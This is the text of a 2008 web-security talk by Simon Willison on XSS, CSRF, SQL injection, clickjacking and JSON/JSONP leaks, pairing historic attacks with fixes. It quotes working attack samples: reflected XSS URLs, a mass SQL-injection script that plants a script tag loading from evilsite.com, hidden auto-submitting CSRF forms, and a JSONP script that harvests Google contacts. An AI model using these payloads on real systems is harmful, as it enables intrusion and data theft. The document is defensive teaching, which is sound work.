Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
1. Web Security Horror Stories
The Director’s Cut
Simon Willison, 26th October 2008
2. The edited version
• On Friday, I spent 15 minutes introducing:
  • XSS
  • CSRF / login CSRF
  • SQL injection
  • Clickjacking
• I promised this talk would provide fixes
3. XSS
• Cross-site scripting
• Attacker injects JavaScript code into your site
• Amazingly common
• A single XSS hole on your domain compromises your security entirely
4. Alex Russell:
“If you are subject to an XSS, the same domain policy already ensures that you’re f’d. An XSS attack is the ‘root’ or ‘ring 0’ attack of the web.”
http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-film-at-11/
5. The same origin policy
“The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0.”
https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
6. Why?
• Without the same origin policy, I could load your site in a frame, iframe or popup window from my site...
• ... and steal data from it
• ... or rewrite it with my own modifications
• evil.hax.ru should not be able to read secret-wiki.bigco.intl
• XMLHttpRequest is bound by the same policy
7. Things I can do if you have an XSS hole
• Steal your users’ cookies and log in as them
• Show a fake phishing login page on your site
• Embed malware and drive-by downloads
• Perform any action as if I was your user
8. Two categories of XSS
• Reflected
  • I embed my JS in a link to your site and trick your user into following it
• Persistent
  • I get my XSS into your site’s database somehow so that it shows up on your pages
9. Real examples
http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script>
http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%20src=http://ckers.org/s%3E
http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/thread/1ab38554971acfc9')&+eval(alert(document.cookie))&+eval('?tvc=2
http://search.live.com/images/results.aspx?q=1&first=21&FORM=PEIR"><script>alert('securitylab.ru')</script>
All from http://xssed.com/
14. • Wrong:
$sql = "select * from users where username = '" . $username . "'";
• Right:
$results = db_query("select * from users where username = ?", $username);
15. Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
http://hackademix.net/2008/04/26/mass-attack-faq/
16. Preventing XSS
• Use a tool that escapes everything on output
• Only unescape stuff that you know is safe and you know contains markup you want to execute
• IE 8 has an XSS filter; this is irrelevant to developers
• httpOnly cookies are mostly a waste of time: they stop injected script from reading document.cookie, but the script can still make requests as your user from inside the page
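The “escape everything on output, opt out only for markup you trust” rule, as an added example in JavaScript. This is not code from the talk; it assumes a tagged template is how your pages are assembled, and the names escapeHtml, markSafe, html and safeUrl are this example’s own.

```javascript
// Added example: escape-by-default HTML rendering.
// Every interpolated value is escaped unless it has been explicitly marked safe.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape for HTML element content and for double/single-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Wrapper that says "this string is already markup I intend to render".
// Only hand it output you know is safe (e.g. a whitelist-sanitised fragment).
class SafeHtml {
  constructor(html) { this.html = html; }
  toString() { return this.html; }
}
function markSafe(html) { return new SafeHtml(html); }

// Tagged template: plain values are escaped, SafeHtml values pass through untouched.
function html(strings, ...values) {
  let out = strings[0];
  values.forEach((v, i) => {
    out += (v instanceof SafeHtml ? v.html : escapeHtml(v)) + strings[i + 1];
  });
  return markSafe(out);
}

// Escaping alone does not make an href safe: "javascript:alert(1)" contains
// nothing to escape. Whitelist the scheme (assumption: http, https, mailto only).
function safeUrl(url) {
  const s = String(url).trim();
  return /^(https?:|mailto:)/i.test(s) ? s : '#';
}

// The reflected-XSS case from the earlier search examples: user input echoed into the page.
function renderSearchResult(query) {
  return html`<p>Results for <b>${query}</b></p>`.toString();
}

// User-controlled text and a user-controlled URL inside an attribute.
function renderProfileLink(displayName, url) {
  return html`<a href="${safeUrl(url)}">${displayName}</a>`.toString();
}
```

This covers text and quoted-attribute contexts only. Data placed inside a <script> block, an inline event handler or a style attribute needs an encoder for that context, and a value you unescape with markSafe is exactly the value your sanitiser must have already vetted.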
17. HTML “sanitisation”
• My users need to be able to add links and basic styles to their submissions
• “I’ll let them use HTML and remove anything nasty”
• An extremely common vector for XSS
  • MySpace
  • LiveJournal
  • Almost anyone else who tries
20. A social network worm
• XSS hole in MySpace’s HTML filter
• When you viewed Samy’s profile...
  • JS makes you add him as a friend
  • JS uses XMLHttpRequest to add his exploit to YOUR profile as well
24. Things to remember
• Whitelist, don’t blacklist
• You’re programming against undocumented parsing routines in closed-source browsers
• Distrust any library that doesn’t have a unit test suite a mile long
• http://ha.ckers.org/xss.html
• http://code.google.com/p/html5lib/ is promising
26. The UTF-7 hole
• Google’s 404 pages used to be served without a character set specified in the HTTP headers or <head> section
• Without those hints, IE inspects the first 4096 bytes to “guess” which encoding is used
• An XSS payload encoded as UTF-7 was reflected into the page; IE guessed UTF-7, decoded it to real markup and executed it
http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
27. You can’t trust CSS either
• Want to let your users include their own stylesheet?
• HTC in IE and XBL in Mozilla are both vectors for JavaScript attacks
• LiveJournal were attacked with this
• A “position: absolute” hack was used to steal 30,000 MySpace passwords last year
http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html
29. Bill Zeller:
“We’ve found CSRF vulnerabilities in sites that have a huge incentive to do security correctly. If you’re in charge of a website and haven’t specifically protected against CSRF, chances are you’re vulnerable”
31. How does it work?
• It pre-fetches the links on a page into a cache, so they’re already loaded when you click on them
• Links like http://app.example.com/delete.php?id=5
• So a GET link that performs an action gets followed without the user ever clicking it
35. So use POST
• You can’t create a page that automatically posts to another site, can you?
36. POST will not save you
<form action="http://app.example.com/delete.php" method="POST">
  <input type="hidden" name="id" value="1">
  <input type="submit" value="More kittens please!">
</form>
fofurasfelinas: http://www.flickr.com/photos/fofurasfelinas/9724483/
37. Or do it with JavaScript
<div style="display: none">
  <form action="http://app.example.com/delete.php" method="POST">
    <input type="hidden" name="id" value="1">
  </form>
</div>
<script>document.forms[0].submit()</script>
Put this in a hidden iframe and your victim won’t even know it happened.
38. The Digg exploit
• A few years ago, Digg had no CSRF protection on their “digg this” button
• Self-digging pages!
http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
39. The Gmail filter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
40. “We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution.”
http://www.freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks
41. Preventing CSRF
• You need to distinguish between form interactions from your user on your site, and form interactions from your user on some other site
• Referrer checking is notoriously unreliable
• Solution: include a form token (Yahoo! calls this a “crumb”) proving that the post came from your site
43. Crumbs
• Should be unique per user (or one user can use their crumb to attack another)
• Hence should be tied to the user’s session or login cookie
• Should be changed over time
• Quick and dirty: use sha1(salt + user’s session ID + timestamp) as the crumb
• The timestamp has to travel with the crumb so the server can recompute the hash and reject stale ones, and the salt must stay secret: anyone who knows it and a session ID can mint crumbs
44. Protecting the crumb
• Your crumb is now the only thing protecting you from CSRF attacks
• This is why XSS is “ring 0” for the Web
• With XSS, I can steal your crumb and run riot across your site
• XSS holes are automatically CSRF holes
45. Crumbs and Ajax
• Ajax can set HTTP headers; regular forms can’t
• Ajax requests must be from the same domain (XMLHttpRequest is bound by the same origin policy)
• So X-Requested-With: XMLHttpRequest can only come from your own site
• You can skip your crumb checking for requests that include that custom header
• That shortcut only holds while nothing else served from your domain lets a third party add headers (see crossdomain.xml below)
46. Login CSRF
• Most login forms skip CSRF protection
• Create a throw-away PayPal account
• Use CSRF to log someone in as “you”
• Hope that they add their credit card or bank details
• Log in later and steal all of their money!
61. crossdomain.xml
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>
Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs
Flash can even fake an X-Requested-With: XMLHttpRequest header
That’s why Flickr use api.flickr.com/crossdomain.xml instead
64. The PDF hole
• In January 2007, an XSS hole was found in the Adobe PDF reader itself
• It could execute JavaScript in the context of the current domain
• Any sites hosting .pdf files for download were vulnerable
http://shiflett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
65. You can’t secure your site 100%, because there’s always a chance a browser or plugin will screw things up for you
68. • JSONP lets you opt-in to sharing your site’s data with other sites using JavaScript
• ... so make sure it’s data you want to share
69. Stealing Google contacts
<script>
// Callback named in the feed URL below; the victim's contact list arrives as its argument
function google(a) {
  var emails;
  for (i = 1; i < a.Body.Contacts.length; i++) {
    alert(a.Body.Contacts[i].Email);
  }
  emails = "</ol>";
  document.write(emails);
}
</script>
<!-- The attacker's page loads the victim's authenticated feed as a script; the browser sends the Google cookies -->
<script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">
</script>
http://blog.adamjacobmuller.com/gmail.txt
http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
70. Jeremiah Grossman:
“If any JSON feed containing user-sensitive information is wrapped with a call-back and has a predictable URL... then that data is at risk”
http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
71. Regular JSON?
• That’s not secure either
• In old versions of Firefox, you can redefine the Array constructor to grab the data
• If your JSON object is an array, the data can be grabbed using <script src="your-data-here">, because an array literal is a valid script and the cross-site include sends the user’s cookies
http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
72. Secure JSON
Use { } as the root, not [ ]
If you’re paranoid about future similar problems, use an idiom like this one:
while (true) {
  {"json": "goes here"}
}
73. And if that wasn’t enough
“More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.”
http://news.bbc.co.uk/1/hi/technology/3639679.stm
• We have a shared responsibility to teach people better online security behaviour
• Don’t teach our users to be phished!